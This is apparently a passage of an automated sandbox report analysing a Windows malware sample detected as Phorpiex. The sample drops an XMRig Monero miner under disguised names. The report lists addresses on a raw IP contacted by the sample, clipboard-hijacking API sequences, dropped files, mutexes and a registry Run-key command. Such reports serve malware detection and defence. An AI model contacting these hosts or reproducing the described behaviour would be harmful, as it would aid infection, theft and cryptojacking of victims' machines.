                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2)
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2a
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3M
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6122658-3693405117-2476756634-1003
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD)
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD00wWP
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD3
                                Source: sysppvrdnvs.exe, 00000004.00000002.2916250466.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 15714163.exe, 0000001D.00000000.2014700788.0000000000012000.00000002.00000001.01000000.0000000C.sdmp, 15714163.exe, 0000001D.00000002.2065701337.0000000000012000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDMozilla/5.0
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDX
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASD_6
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDui
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/ALLBSTATAASASDyi2
                                Source: 2573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://91.202.233.141/TLOADEDBROMozilla/5.0
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                                Source: powershell.exe, 0000001F.00000002.2150868586.0000026E9006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, powershell.exe, 0000001F.00000002.2127566085.0000026E80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: powershell.exe, 0000001F.00000002.2127566085.0000026E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A76A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001F.00000002.2127566085.0000026E80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000024.00000002.2322777022.00000289BFAC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2883930454.00000156CF2C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                                Source: powershell.exe, 0000001F.00000002.2127566085.0000026E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2250444206.00000289A76A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000024.00000002.2250444206.00000289A78C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com?
                                Source: powershell.exe, 0000001F.00000002.2150868586.0000026E9006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2313513367.00000289B770C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_004059B0
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.000000000131B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_fdfc7f94-f

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Yara detected Phorpiex
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1532857494.000000000132C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: lJ4EzPSKMj.exe PID: 3780, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 5232.scr PID: 5460, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 760, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 5236, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5232.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: Process Memory Space: winupsecvmgr.exe PID: 6108, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040FB45 NtQueryVirtualMemory,3_2_0040FB45
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,3_2_0040DF20
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040FB45 NtQueryVirtualMemory,4_2_0040FB45
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040DF20
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040FB45 NtQueryVirtualMemory,17_2_0040FB45
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,17_2_0040DF20
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeCode function: 18_2_00007FFB4ABE0F11 NtQuerySystemInformation,18_2_00007FFB4ABE0F11
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E6983F40 NtDelayExecution,38_2_00007FF6E6983F40
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrFile created: C:\Windows\sysppvrdnvs.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004084D03_2_004084D0
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004084F93_2_004084F9
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004040903_2_00404090
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040AEB03_2_0040AEB0
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004049703_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040F9083_2_0040F908
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084D04_2_004084D0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084F94_2_004084F9
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004040904_2_00404090
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040AEB04_2_0040AEB0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004049704_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040F9084_2_0040F908
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084D017_2_004084D0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084F917_2_004084F9
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040409017_2_00404090
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040AEB017_2_0040AEB0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040497017_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040F90817_2_0040F908
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69985C038_2_00007FF6E69985C0
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E6993DE038_2_00007FF6E6993DE0
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E6996D8038_2_00007FF6E6996D80
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E698719038_2_00007FF6E6987190
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFB4AC152FA39_2_00007FFB4AC152FA
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe 1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6E6983F40 appears 34 times
                                Source: nxmr[1].exe.28.drStatic PE information: Number of sections : 11 > 10
                                Source: 1428024550.exe.28.drStatic PE information: Number of sections : 11 > 10
                                Source: winupsecvmgr.exe.30.drStatic PE information: Number of sections : 11 > 10
                                Source: 513318274.exe.4.drStatic PE information: No import functions for PE file found
                                Source: lJ4EzPSKMj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: Process Memory Space: winupsecvmgr.exe PID: 6108, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@64/42@2/39
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,3_2_00406F70
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,3_2_00406660
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Windows\sysppvrdnvs.exeMutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
                                Source: C:\Windows\System32\dwm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile created: C:\Users\user\AppData\Local\Temp\5232.scrJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCommand line argument: %userprofile%0_2_00A91061
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCommand line argument: %s\tbtnds.dat0_2_00A91061
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCommand line argument: %temp%0_2_00A91061
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCommand line argument: %s\%d.scr0_2_00A91061
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCommand line argument: open0_2_00A91061
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCommand line argument: (#~25_2_007E10A0
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCommand line argument: `#~25_2_007E10A0
